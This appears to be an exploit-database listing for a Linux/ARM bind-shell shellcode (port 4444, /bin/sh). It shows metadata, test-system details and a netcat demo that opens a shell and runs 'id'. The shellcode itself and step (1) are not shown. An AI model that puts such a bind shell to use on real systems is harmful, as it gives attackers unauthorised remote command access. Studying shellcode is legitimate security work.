Exploits / Vulnerability Discovered : 2018-09-26
Type : shellcode
Platform : arm
This exploit / vulnerability, Linux/ARM bind (0.0.0.0:4444/TCP) shell (/bin/sh) + null-free shellcode (92 bytes), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
/*
# Title: Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)
# Date: 2018-09-26
# Tested: armv7l (Raspberry Pi 3 Model B+)
# Author: Ken Kitahara
[System Information]
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $
(2) Connect to 127.0.0.1:4444/TCP from another terminal.
pi@raspberrypi:~ $ nc -vv 127.0.0.1 4444
Connection to 127.0.0.1 4444 port [tcp/*] succeeded!
id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
exit
^C
pi@raspberrypi:~ $